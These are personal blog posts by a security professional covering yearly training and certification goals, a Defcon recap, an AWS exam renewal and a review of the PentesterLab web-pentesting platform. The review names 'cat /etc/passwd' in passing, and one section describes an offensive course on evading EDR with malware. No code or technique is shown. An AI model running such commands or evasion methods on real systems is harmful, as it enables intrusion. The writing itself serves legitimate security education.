It’s January, it’s cold, and I have a day off, so that makes for a great time to get introspective and look at my plans and goals for learning and training this year! Sometimes I look to make themes out of my years, and this year I’m probably due to stretch my red team/offensive legs again. I also had a shorter list last year, and this year seems like I’m swinging back into things. Hopefully not too heavily that I get burnt out, but I do have some pressure valves built in that I can pump. On the plus side, I don’t really have any intense things to renew all year.

Formal Training & Certifications

CISSP – It’s barely worth mentioning, but I do need to note to myself that my CISSP expires in April 2024, so I should renew that early on. That’s mostly about getting my CPEs entered.

CSA CCZT – A few years ago I took the CSA CCSK and passed. I saw last year they now have similar material and certificate centered on Zero Trust topics. I’m sketchy, but serviceable on the topic, and I’d like to just properly prove and improve that. This is fairly low pressure, too.

ISACA CISM – I’m not sure how or why this got on my list, but it’s on my official list for work, so I’m including it here until I decide to not do it. Or just do it. This isn’t a cheap exam, but is relatively inexpensive to study for other than the time. We’ll see where I can fit this in. Part of that equation is evaluating the benefits of this cert and its maintenance.

Informal Learning

I have access to a year of Antisyphon On-Demand courses that started very last in 2023. This means I have 25+ courses to consume. Low pressure, and I don’t intend to do all the labs, so this can be something I tackle in pieces.

I also have access to a year of HTB Academy. I mostly got this to gain eventual access to the tier 3 and tier 4 topics, but the rest of the modules can act as refreshers. There is a cert that is slightly intriguing in the Pen Tester path, but I’m not in the mood to entertain that right now.

…and access to MITRE ATT&CK Defender for a year. I’m not entirely sure what this will be, but I had some work budget to spend at the close of 2023, so signed up here. This is partly to see what this service is about and whether I suggest it to others on my team.

…and access to BlueTeamLabs. I’ve been doing this for several years now, and will have another year of access. This is mostly maintenance mode, which means doing new releases every few weeks and helping others.

OffSec Learning Unlimited has been a thing I’ve been eyeballing since it was first offered, and this year I’m putting it on this list. The above things I’ve already gotten access to, but this one is a heavier purchase and if work is willing to provide part of the cost, I’ll cover the rest, including the time commit. And a commit it will be, which is another reason I’ve not yet opened up this subscription. I want to make sure I’m in a place where I can spend a good portion of time for the price. I don’t have any plans to take another OffSec exam, but if I did I’d target the OSWE.

It’s hard to plan a red team year without some HTB time commit thrown in. I hope to dabble on this site again some more. I’m unsure if I’ll spring for VIP yet, but it’s possible, especially if it helps reinforce and practice HTB Academy modules using retired boxes. (On the downside here, HTB is a lot different in its user base than it was years ago. It’s very perturbing to do innocent searches for error messages or exploits against a technology only to find spoilers for live boxes quite readily available. This never happened years ago unless you knew the right people…)

It’s hard to commit to Defcon as it tends to be a big expense, plus risk of sickness. But, I’m putting it on here to figure out this plan before too late. I’d like to go, but it’s also OK to not go. And if I do go, it’s not just about planning hotel, flight, and budgets, but also activities such as any competitions I may want to prepare for.

Other & Parting Thoughts

Last year right around Defcon, I started taking up running for the second time in my life. I loved it, but got away from it late in the year as I was trying to figure out some mysterious ankle pain (on my right Achilles area). During my time, I lost about 35 pounds, and more than the raw number, I could tell the difference. So, I want to get back to exercising properly again, in however fashion I can, even if running ends up being too much impact. This has always just been about being lazy; I love the burn, I love the (good) soreness, and it’s never boring to me.

Lastly, work has a decent influence on what I do, since, well, they pay me and often I’m using budget for the above learning opportunities. I’m hoping to bring some gentle purple team sensibilities and practices to our team in 2024, which aligns with my own personal time focus. Not everyone has an interest in doing both attack and defense, and I consider that adaptability to be one of my strengths. One which I want to keep honing into the future. It’s really either that or continuing to build practice cloud experience in Azure and AWS! 🙂

It’s been since Defcon 22 that I made it out to Vegas for the premiere hacker summer camp, but I finally got a chance to go out again, post-covid. (Spoiler: I’ve been covid-free since the outbreak, but brought it back with me from Defcon, assume-ably. I first showed symptoms 3 days after the con. Thankfully, vaccines and boosters make for a smoother ride.)

My goals this year were to not attend any main track talks, not wait in line for any talks, and to just relax and have some fun in whatever fashion that presented itself. I feel like I accomplished those goals just fine!

Rather than itemize or talk about a bunch of stuff that can be found in other places, here’s my list of Good and Bad things from my experience. Though, let’s be clear, this was overall a great time.

Bad

1. 20,000+ people (I’m estimating) plus all the norms. So, my first Defcon was DC16 with about 8,000 folks, and then DC22 with about 22,000. And in those locations, you would walk around the casino area and probably 80%+ of the people present would be hackers. Right before the covid19 pandemic, Defcon was topping 30,000 attendees! That’s a huge mass of humanity! Now that Defcon is at Caesar’s Forum, this means the con sprawls across several Caesar’s properties. It also means as you wander the properties, there are also far more norms walking around, probably even about 50% of the people around at any given time. Personally, I’d rather be more surrounded by my people. Still, that’s a lotta people in small places, and it makes for some less than comfortable environs for an introvert who likes his space like myself. Thankfully, I know myself and my limits pretty well and can handle things just fine. And having more people means more con, so…the fact of having so many people together is both good and bad, but probably overall good.
2. Still COVID. There’s still Covid around, which sucks. Thankfully wearing a mask the whole weekend is quite acceptable with this crowd. The problem is I don’t normally wear a mask for hours a day, and I realized I got pretty warm with one on all day. My body isn’t used to regulating down that heat with limiting mouth freedom! Between that and the dry air, it was pretty easy to start sweating.
3. I was ill-prepared, tech-wise. I didn’t take much tech with me, basically a laptop. Turns out, I wanted to do contests! And get on the defcon wireless network! I sure could have used a portable monitor. More laptop resources. A better wifi adapter. Notes for next time, especially if I want to try more contests, which I do.
4. Some villages were… I swung by almost all of the villages, and I got into several that were super fun and interesting (and packed). But some I didn’t get into at all due to busy talks taking up all the room capacity and creating lines outside. And some villages were literally just talks unless you pre-signed up for something. These latter villages left me super disappointed and made it feel like these are just alternate talk tracks and nothing else. App Sec, Cloud, and Red Team villages, to me, were simply not useful or accessible to me and I never got into any of them. And they were among my priority ones.
5. I wasn’t prepared for the other events. Lots of Defcon content and contests start months in advance. The moment I commit to attending, I need to continually visit the site and forums and start getting an idea of what is available and what I’d like to do or check out.
6. Food and Drink Prices. Oof, $12 beer bottles, $24 burgers, yikes. Thankfully there was an easily-found Walgreens just 3 minutes north of Harrah’s that was open 24/7 and provided essential fluids, snacks, and sandwiches to keep costs down. Close, fast, efficient.

Good

1. So many contests! It’s been since DC22 since I’ve attended, and the ability for Defcon to entertain and challenge 20,000+ people has matured a lot! I swung through the contest area several times, and each time I saw new things I missed previously. Even the villages had contests. I spent a day fighting up into the top 9 (of 220) of the Blue Team Village CTF, played and beat some demo game about Intelligence Operations and CTI, submitted threat model suggestions (which is something I’ve never formally done before), and poked at numerous puzzles and challenges. I probably would have spent far more time on the con floor doing these contests around like-minded folks if not for the covid spectre hovering about.
2. Linecon + Merch. This is my second time staying up all night for Defcon registration. It’s now official, as Linecon! While we pre-registered already, my friend and I opted to still stay up all night and we were essentially first in line on the pre-reg side. We got in line at about 5pm, had our badges in hand at 7:05am the next morning, were among the first 30 in line for Merch, and hit up the vendor area shortly after. We were back in the room by 9am to upload loot and freshen up. While I’m not getting younger and the last time I stayed up all night was a previous Defcon, there are good points for this. First, there’s not a TON of things going on at Defcon on Thursday. Second, Linecon itself is fun and the people are excellent. (I also got my picture taken on the official Defcon stage as if I were giving a talk!) Third, you get full and first crack at merch and vendor gear and you get it out of the way before lines take hours and things sell out. This helps free up the rest of the con time for other things! (Or other lines to stand in!)
3. Chillout room + SomaFM. Dude, I love SomaFM. I’ve been a listener since 2002. I love the chillout room at Defcon when you can get a reasonable seat and just do some contest shit or whatever. It’s still lots of people, but grab a drink or two and relax as you can! It’s just the perfect vibe.
4. I was never lost! At the Riv or Rio I was constantly lost. I never really found myself lost in the Caesar’s properties. So, that’s cool!
5. Villages with things to do. Hands on things at Lockpick and Physical Security villages were awesome. Even the Tampering village off to the side was informational!
6. Movie night. I did movie night at DC16 and loved it, though it was pretty packed, but kinda skipped at DC22 in favor of parties/live music. But, this year I was spending time doing contests and had been sitting in the Chillout room. Then, when the live music started booming there, I took the vibe over to the movie night room and sat behind everyone else and continued doing hack stuff while also enjoying the movies. There was something about the vibe that just worked.

The Future

I have no idea how often I’ll get back to Defcon, but if I can do it ever year, I am not sure I’d mind. Flying was 0 hassle this year, and really everything with regards to logistics and costs were fine. If I do go back, there are some things I want to keep in mind.

1. Pre-plan more, especially contests. Man, seeing those black badge contests get wrapped up was super invigorating. While I have no skills that would help in the main Capture the Flag, there are other events I have a chance at if I can do some pre-planning and research/practice. I’d like to start on time with next year’s Blue Team Village CTF, and I’d love to try out the Capture the Packet. This pre-planning also means making sure I have gear that helps provide for success. Beefier laptop and portable monitor and wifi adapter, for starters. SE and Lockpicking could be fun contests, too, but definitely research the forums!
2. Scav Hunt. The scan hunt always looks super interesting, and if I continue to know more people and first-timers at the con (e.g. coworkers), I might push to make doing the Scav Hunt a priority. That said, knowing a native in Vegas would probably help!
3. Linecon. I’ll definitely do Linecon again. This year I took is easy as I was super wary about whether I can handle lack of sleep at my age, but things went fine. However, I’d like to bring a game or two, and maybe some sort of chair.
4. BSides. I have never done BSides LV, but for a couple extra days, that seems like a fine way to go to actually see some talks and do a bit more casual conversing.

Every year I try to make some learning and training goals and review my prior goals. This has gotten a lot looser in recent years, maybe due to time stretching outward in these crazy times.

I did lots of maintenance in 2022.

Formal Training/Certifications

Completed the Offensive Development course with Antisyphon virtually through Wild West Hackin’ Fest in the latter half of 2022 (yes, the link is to this year’s syllabus). This course was a 2-day exploration of writing and editing malware to get past EDR for successful execution on protected endpoints using Cobalt Strike and other red team structures. I really enjoyed this course as it really pushed my boundaries a bit. I just wished I had the time to go over it a second time for maximum uptake. The course says it is intermediate, but I would think this is really an advanced course if you want to follow along by doing the labs successfully.

Renewed my AWS Solutions Architect Associate certification (which also renewed the AWS Cloud Practitioner). See my post for these details.

Renewed my GIAC GCFA (FOR508) certification. This is really just paying a fee to get renewed plus updated materials and course recordings and lab files. I still need to actually go through the new stuff.

Renewed my CISSP. Again. Just fees and CPEs that needed recorded.

Informal Training

I spent a ton of time in the early third of 2022 on the BlueTeamLabs.online (BTLO) site doing their lab investigations. I did this enough to eventually land in the #1 spot on the leaderboard. I’ve posted a bit about their labs already, and I’ve even done some write-ups on retired content. Even at the time of this writing, I’ve been trading off with a few others for the #1 thru #3 spots as BTLO releases new content.

I also continued to spend time on PentesterLab earning most of their badges and finishing something like 450 of 480 challenges (not all of which were actually available). I have since let this subscription lapse, but fully intend to get back on again when I have some time and money to spend. (And also finally figure out the code review 11 challenge that has been my bane!) This was nothing done over just one year, but rather multiple years.

I’ve finally gotten on board TryHackMe for the first time last year. While I like the platform, it’s definitely a different environment than HTB or BTLO. I’ve like to do more here, but I also have to make sure I do things that are worth while as there is lots of content that is geared more towards entry knowledge levels. I spent most of my time on the Red Team tracks as I found these to be nice ways to review old skills, brush some dust off, and even learn some new tricks and tools.

Practical Malware Analysis book. I include this because it’s not just a book to casually peruse or even fully read, but is also a collection of exercises and labs to progress knowledge and practice techniques. I was turned further onto this than normal due to the “Counter” investigation on the BTLO platform. I didn’t get as far as I wanted on this last year, but I made progress and pushed my boundaries when it comes to using a debugger. I hope to do more.

Almost 3 years ago, I earned my AWS Solutions Architect Associate certification. This past week, I took the exam again and passed in order to renew that certification for another 3 years. I drive about 90 minutes to my preferred Pearson VUE exam location, but this time I had to make the 90 minute drive back without knowing my exam outcome. Amazon now reviews things afterwords. I received no email yet, but within 24 hours my Exam History section on their certification portal was updated with my outcome. AWS has given me scores immediately on my last three exams; the technology exists, so give me a score right away and review things later to make it official if you need to. Anyway!

I did not study as much as I wanted or should have this year. I hadn’t intended to take the exam in October, but at the start of the month when I looked for times to book, my preferred venue had all sorts of times in October, and none at all in November or December. So, I snap booked as far out as I could, and got to work studying. Unfortunately as timing would go, Wild West Hackin’ Fest occurred which I not only attended virtually, but took some intense training in the first few days as well. I’ll come back to this later as notes to my future self 3 years from now.

Last go around, I used A Cloud Guru courses, Linux Academy courses (namely Adrian Cantrill’s excellent course), and practice exams from Jon Bonso (Tutorials Dojo). Since then, the landscape has changed as both Linux Academy and A Cloud Guru have been swallowed up by other players, and more honesty has been openly shared about the latter’s quality of offerings. (I really wasn’t terribly impressed 3 years ago, but ACG seemed to be everyone’s darling at the time.) This year I also have access to many Udemy offerings for free through my employer.

I started out purchasing and going through Jon Bonso’s Tutorials Dojo SAA-C03 course on his own platform. I loved his practice tests 3 years ago, so I figured I’d also do his course. In retrospect, this course wasn’t right for me, nor did I enjoy the platform. The platform doesn’t give me a good idea how long the whole course or sections are, and the player never saved the speed settings I preferred (1.25x-1.5x speed). The course itself was also…for lack of a better way to put it…not filling enough of my knowledge taste. Lots of slides. There is something to be said about even watching someone else use the AWS console to do things, which helps show the features and settings in more context. There was very little of that in this course.

Next, I started doing the set of SAA-C03 2022 Practice Exams on Tutorials Dojo. These are still absolutely excellent. Previously there were 6 exams, but now there seem to be 6 timed ones, 6 that show the answer as you go, and several other topical sets. There are times where it feels some questions reappear from one test to another, but I still feel these are the best practice questions that reflect both the subjects and the feel/style of the official AWS questions. Highly recommend.

Lastly, I went through most of the Udemy course, Ultimate AWS Certified Solutions Architect Associate SAA-C03, by Stephane Maarek. This is a phenomenal course that I absolutely loved. I have nothing bad to say about it at all. I love that Stephane goes through the materials, but then also goes through many of the services and concepts hands-on in the console where we get to see him build things and tear things down such that we could do these in our own AWS Accounts if we want to. I made it about 50% through this course and focused on my weaker areas.

And that was all the time I found I had to study, which left me rather worried and feeling less prepared than I prefer to feel for exams like this.

For future me, here’s my suggestions. First, schedule early even months out. This provides the most flexibility to study appropriately while also allowing plenty of time to do all the practice tests and really get used to the topics over time. Normally, I am very good about this and my planning, but this year has been hectic. Second, look up these authors (in any order) and take their courses: Adrian Cantrill, Stephane Maarek, Neal Davis, Jon Bonso (practice exams). Maarek and Davis also have practice exam sets, but I did not get a chance to sample them. Third, look at the AWS exam guidelines and scope document, but do not get distracted by new and specialized services. Keep focus on the core important services. You’re far more likely to get 5+ questions on Lambda than on AWS Polly. For the latter, know their elevator pitch, purpose, and if there are sub-services to know. Fourth, do practice exams every few days if possible. Don’t go through any a second time, as that is just an exercise in memorization/recall of specific questions. Amongst the authors above, there are *months* of practice exams to consume for relatively little cost. Do them, and the real exam will feel like a familiar place.

I think I said it before, but I’ll say it again this year: I feel that every single question on the exam is directly sourced from either the AWS official documentation or from the AWS blogs/whitepapers which cover using services, service features, or designing for certain use-cases/situations. And while that may seem obvious, it bears repeating to let that sink in: read the things. Also, any hands-on whether it’s watching someone else or doing it yourself in a lab or for your own personal or work stuff is necessary in order to see features and settings in context and in action. I mean, this certification is meant for people with 1+ years experience in the role!

Next up is renewing my AWS Security Specialty certification, and then in 3 years deciding what to renew or advance.

In 2020, I started doing exercises on the PentesterLab (PTL) platform. To date, I’ve earned 16 badges (certificates) on the site, and have completed 440 exercises with only 13 currently available exercises left to tackle. Last night I became the 4th completion of the Brown Badge, and I realized I’ve never really shared or posted about my efforts or thoughts on the site.

PentesterLab is an online platform founded by Louis Nyfenegger which aims to teach students web application testing skills using hands-on curated labs that require practical skills to solve exercises. You know, for web pentesting and bug bounty hunting! The lab exercises are largely performed on a web application that the platform spins up, and students attempt to find a hidden key or achieve execution of a scoring binary on the target system to get the exercise completed. A huge section of code review challenges is an exception to this formula where students provide the file name, line number, and type of vulnerability present in order to score the exercise as completed.

All exercises include an introductory description, though some are quick and throw students right into the challenge, while others provide lengthy in depth discussions of the techniques and exploits utilized. I’ve always found these to be at the right level of detail for me to see success on the platform, with a nice mix of research, reflection, and rote practice.

Many exercises have video solutions posted by Louis, but if you play along early enough before they get posted, you don’t have the luxury of a solution key to fall back onto. Plenty of the exercises still today do not have solutions posted, adding to the challenge of completing some of the badges. But, most of them do, which allows students to challenge themselves at their own tolerance levels before peeking at the videos. Also, those videos don’t actually give you the scoring key. To score a completion, students still have to go through the practical steps to exploit and solve the exercises.

Overall, it’s been an excellent platform I’ve been on for a few years and has helped me learn a ton of things relating to web app security.

Surprisingly, the exercises have a decent replay value to them. With so many, by the time six months pass, I won’t remember all the solution details if I revisit something. But, more importantly, I can solve them in different ways. A good example is the HTTP badge, which can be entirely solved using curl commands, but I also have chosen to solve them with Python and Ruby scripts as well. Many solutions can be derived using a scripting language of choice, providing additional opportunity to hone new skills. The platform accommodates this as you can run the scoring binary again, and the site will tell you it was a fresh score. And obviously you can just retrieve the correct key from the site for those challenges.

Another thing I like about the platform is how it dances between the line of being a platform of exercises versus a platform that is just a course. It really ends up doing both, which I appreciate and fits into the way any penetration tester should be learning and tackling these things. Courses are great to teach things, but practical exercises are irreplaceable hands-on opportunities. And leaving some details out or fuzzy will cause the student to do some outside research, think a little, try and fail at things, and then try harder. And this is ultimately the mindset a tester needs to have, since they won’t normally have access to hints, nudges, or answers out in the real world of testing.

Much like almost any pentesting lab or series of challenges, there are also some very specifically vulnerable entries that are unlikely to be found in the wild, but they do act as ways to think about things differently, or open creative avenues that may be useful in the future, even if today that particular vulnerability is solved or just so derived that it’s not realistic.

My scripting skills have markedly improved in Python and Ruby during this course. Coming into this, I was passable with Python and had 0 experience with Ruby beyond maybe running an exploit of EDB or something. But, during this course I’ve had the chance to write more Python and Ruby scripts, or edit and adjust existing ones or those from the answer videos, that I feel comfortable digging into deeper topics and weaponizing exploits. In addition, students can walk away with scripts that can act as frameworks for future endeavors. Maybe a script to generate a tampered JWT will work in other engagements, or maybe that deserializer can be used the same way for a test a year from now.

Likewise, I’ve used Burp Suite for many years, but like any complex tool, that skill only sticks around as long as one greases the wheels on a regular basis and uses it. I get to drop into Burp on most exercises, and poke and prod and learn new things.

And just like any pentesting learning platform, all of this is often about three important things: exposure, experience, and practice. PTL ends up providing all three, which is great for building a body of experience and confidence in the skills.

For someone looking to prep for something like the OSCP, I’d say there’s no real hand-holding here to get your testing platform up and running or for easing into understanding and using Kali, Linux, Burp, HTTP, or other possible tools. Still, the badges I suggest below to start out will still be helpful to anyone going for their OSCP, as there is still plenty of web application exploits and targets present in the OSCP course and exam.

For someone looking to get into we app pentesting or bug bounties or even pentesting in general, I’d say do everything here! As far as skill level expected, I’d say something like the SANS SEC542 course and GWAPT exam probably can act as a more introductory-friendly way to dive into web app testing and understand the essentials, but I’d immediately follow that up with running through PTL. OSCP courses and things like eCPPT probably similarly can ease students less comfortable with things like Linux and Burp and web coding concepts.

Students who find the most success, though, should come to this platform with a comfort level in operating Kali Linux, web server architecture (most specifically Apache server operation), using Burp Suite (proxy and repeater, nothing intense), maybe a fuzzer like wfuzz, reading packet captures, and definitely have some comfort level in or ability to learn web code and scripting. Good examples will be some php, javascript, and java, but mostly python and ruby. This may sound daunting, but most of this is about exposure and being in a position to take the next steps and not be hung up on what Python is or what cat /etc/passwd means or how to intercept using Burp. I’m not sure PTL is good for “My First Reverse Shell From a Web Server,” but it’ll be the next steps after the first one.

The platform is not entirely clear what order to tackle the badges in. I’ll attempt to provide some guidance here, but generally speaking, tackle the ones that have the most completions first, and the ones with less completions later on.

I would suggest students or those with newer skill levels in the topics tackle these badges first: INTRODUCTION, ESSENTIAL, UNIX, RECON, HTTP, PCAP. These all really hone in on specific tasks and other foundational concepts that will be useful at all levels. And for those who know these topics, you may still learn something new of have an opportunity to solve them in different ways. For example, maybe parse the PCAP programmatically instead of in Wireshark. Or in the HTTP badge, script the solutions rather than use curl. The Essential badge is where you find your beginner types of web app topics.

From here, you can honestly go anywhere else, but continue on for general guidance.

The API badge could be something to tackle next. This badge isn’t totally released at the time of this writing, but the exercises are pretty basic to date and follow the ESSENTIAL badge topics pretty well.

Going down the rabbit hole of the other badges, here’s a good route to follow: WHITE, YELLOW, BLUE, SERIALIZE, GREEN, BROWN. Most of these progress naturally, though the BROWN badge sometimes feels like it has exercises that could be slotted into the other badges, but those badges were already complete when these new CVE’s or attacks came out, and just needed a place to land. Still, several BROWN exercises directly suggest solving some others scattered elsewhere first.

The INTERCEPT and ORANGE and AUTHENTICATION/AUTHORIZATION badges are more intense as far as requiring more work on the student to host things like a DNS server or a public endpoint to perform XSS or other reflection attacks. These definitely present a different set of challenges. The AUTHENTICATION/AUTHORIZATION badge is all about SAML and OAuth, but again often require you to host an endpoint that is part of the exploitation path.

The CODE REVIEW badge is a weird one in that you’re reading code and identifying the problems in that code. There are also tons of videos separate from the exercises. Some of these give a half-dozen lines making them kind of easy, while others are long sections of code across multiple files which increases the difficulty of finding the needle in the haystack, as it were. Since this badge is super long and not completed yet, I suggest tackling these in between other badges to keep things fresh. Also, I consider this badge super unique in that I’ve not really seen exercises elsewhere before that specifically target code reviewing skills.

The ANDROID and CAPTURE-THE-FLAG badges are sort of one-off badges students can do whenever. ANDROID is specific to Android applications, and I have no idea how difficult these really are. Java and Android are well outside my comfort zone, so I leaned heavily on the videos to progress through these. The CAPTURE-THE-FLAG badge contains some common CTF-like challenges that involve web or crypto-related topics. They’re fine, but definitely not common fare for web app pen testers.

To date, I have done none of the JAVA SERIALIZE or MEDIA badges, so I can’t comment on those.

Overall, my time in this platform has been good and I’ve learned a ton and gained lots of confidence when it comes to understanding and even walking through various web exploits and weaknesses. I’m no developer, but I think I can hold my own discussing security topics on a practical level like one, though.

I don’t recall where I found this graphic, but at least it has citation on it. I liked it enough to keep it, and just wanted to move it out from my personal notes into here.

I do like these steps, though obviously there are plenty ways to tackle this problem. And if someone needs or needs to show some sort of process/plan, this makes a good pragmatic start.

One thing I would change on this is to make sure this isn’t like a 1-year process right here. I feel like steps need to be taken pretty quickly to start *doing* something and getting some output and value. For example, Step 7 shouldn’t be waiting for earlier steps to develop. Step 7 should strive to start as soon as positive movement can be achieved. Early, easy wins, or foundational pieces.

I also prefer to think in terms of maturity levels based on some sort of model. I think that’s what is meant here by tiers. That is just a difference in preferred terminology.

This is my sixth year openly posting about my learning and training goals, though it feels like I skipped a year. Last year was not a productive year on the personal training front, so most of my items here are not really new. And I’m already about a half year late making a post like this, which means a few of these items might already be done or in flight.

So, what do I have in play this year? I’ve sort of skewed things a bit towards the blue team side of things last year, and that’s still the plan this year. I pride myself with having deep knowledge of red, blue, and forensics skills and I possess a strong belief that each plays and improves upon the others, whether in a team situation or as a long wolf.

Formal Training/Certifications

AWS Solutions Architect Associate certification renewal. I’ve done this once, so should be good to do again, but I’ll be consuming courses on Udemy and ACloudGuru in this pursuit. I truly thought about doing the Professional version of this, but I’d like more consistent hands-on AWS work before it.

AWS Security Specialty certification renewal. I’ve also done this once, and am not too worried about this one, but I do distinctly recall these questions were dense and tricky. As with SolArch, I’ll be using Udemy and ACloudGuru to prepare.

CISSP renewal. This is really about paying the fee, yet again. With all the other stuff I do, the CPE tanks are always full.

GIAC GCFA (FOR508) forensics certification renewal. This is also just paying the fee. But, I then need to carve some time out to go over the updated course materials and labs.

Antisyphon training courses. I’ve really liked the format of the BHIS/Antisyphon courses, and the cost as well. I plan to continue to take courses here as long as they have interesting topics offered. I’ve so far taken three, and while I’d just take them all if I could, here are some leading choices: Applied Purple Teaming (Ickler/Drysdale), Enterprise Attacker Emulation and C2 Implant Development (Thyer), Hacker Ops (May), and various others that tend to lean into Red Team stuff.

OffSec. A stretch goal. Since getting my OSCP some 5 years ago, I’ve wanted to get back and do some more of the advanced courses, labs, and subsequent certs that Offensive Security offers. I just haven’t done it yet. I likely won’t get to this in 2022, but I think in 2023 I want to look very hard at the annual subscription which opens up materials for all of OffSec’s certs.

Informal Training

BlueTeamLabs.online. BTLO is a sort of blue team themed lab and gamified ladder, much like HTB is for red team skills. The company behind this also offers courses for blue teamers, but I’m more interested in the labs to practice skills, learn new tools, and improve what I know through hands-on trial and error in a safe environment. This has exceeded my expectations so far, and I’ve even exceeded my own goals on the platform. I started out just wanting to learn some things and maybe make the top 100. Today, I’m trading off the global #1 spot with several others.

Practical Malware Analysis book and Reversing, debugging. Getting into and even successfully through the RE challenges on BTLO has whet my appetite for continuing down this path some more. I’ve long dabbled very lightly in reversing, debugging, and dissassembly, but never to a degree that makes me feel skilled at it. I’ve broken through some barriers while doing BTLO challenges, and I’m wanting to keep that ball rolling. I’d like to go through exercises in the Practical Malware Analysis and Malware Analysis Techniques books while also getting started in TryHackMe’s related areas. I also still have access to the Zero2Automated course set, but that seemed a bit beyond me when acquired a few years ago.

Microsoft Azure and M365 stuff. I namely want to just go through materials for AZ-900 & AZ-500, and then also MS-900 & MSSC-500 and other stuff in the SC-series. I don’t really plan to pursue any of the associated certifications, but I’m not entirely ruling it out, either. This is mostly to get more exposed and build foundations in Azure and M365 offerings as they become more and more ubiquitous in the enterprise. Very similar to picking up AWS skills a few years ago. Also plan to learn more about Azure Sentinel.

Splunk Learning. I use Splunk at work, and I’ve long put off the more formal courses. Splunk has recently re-organized their certification and learning offerings, and while I can’t say I think they’re good changes, I still want to plug through the material at some point. Much like MS stuff, I don’t necessarily plan to do the certifications. These courses are definitely only worth it if the business or Splunk credits pay for them. It’s otherwise better to just sign up for Boss of the SOC (BOTS) (free!) on a regular basis to gain some hands-on experience.

TryHackMe (THM). I’ve only briefly used this platform once, and just have not made the time or effort to get back here. I think now might be the time. I’ve almost fully completed BTLO, I don’t really want to go back to HTB yet, I’ve gotten up to where I want to be on PentesterLab. And THM is just a blank spot for me that I shouldn’t have let go so long.

PentesterLab. I still have a sub to this lab site, and while I’m mostly caught up on what I want, they still push out content enough to keep me coming back, particularly on the Code Review badge lately.

C2 & Attacker Emulation. Last year I took a course in using various C2 platforms, but didn’t feel like I got quite enough out of it on the first run. I’d like to wield my home lab a bit further and try more C2 platforms out and just gain more familiarity. If I achieve other things before the end of the year, this could be a nice break before 2023 activities.

Gentle Career Aspirations

I don’t normally do this, as I don’t want to suggest to potential employers that these are the only things I want to do, but it’s good to at least tell myself these things in case career opportunities land in my lap. But, in a way, doing these for work in the next few years would probably make me a happy employee (not that I’m not happy now, but it’d be exciting to look forward to and then learn and do):

• pentesting, red teaming, purple teaming…even just testing new exploit POCs
• C2 and attacker emulation to test and improve controls, both technical and response
• web app testing and other application/development security
• architect-level planning and design and advisement, configuration hardening
• ever-increasing hands-on in AWS and Azure/M365

Back in the early 2000s I often used my blog to hold notes, links, and things I’d consumed or done or would check deeper into or read or do. Over the years, this activity sort of moved away from being in a blog, and more to my own private notes, or into Pocket (never to be seen again!). I feel like some of this is the result of the growing avalanche of information at our fingertips from 2000 until now.

I’ve gotten to the point where I kinda want some of that stuff cycled out of my private notes, but not always entirely lost. Something I could possibly still search and re-reference, without maintaining my own mini-encyclopedia of topical notes and links and to-do lists. Honestly, sort of the same itch that a diary or journal serves for thoughts and experiences…or other blogs and feeds. And the same sort of thing that will just go away when I do as the domain/hosting expires. (See, that’s the good part of hosted blogs, like blogspot and blogger, right? They’ll stay around?)

So, maybe I should start to empty out a bunch of my private notes into my blog here! I mean, on the other hand, why not? And while not private, it’s not like a bunch of folks will read most anything I put in here. 🙂 I feel like the days of personal blog-popularity are long gone anyway.

I used to also have a personal wiki I hosted, but never really did too much with, that I could resurrect for some things. Or just move that sort of usage over to Github Wiki.

I don’t think I’ll ever use a blog as a “to-do” list, as that is way too suited to a notes app. But, I can at least have a way to trim things off without feeling like I’m forever losing a resource or reference. Thereby maybe regaining control of my “to-do” list! Let some things go, ya know?

Anyway, I’ll see how this goes.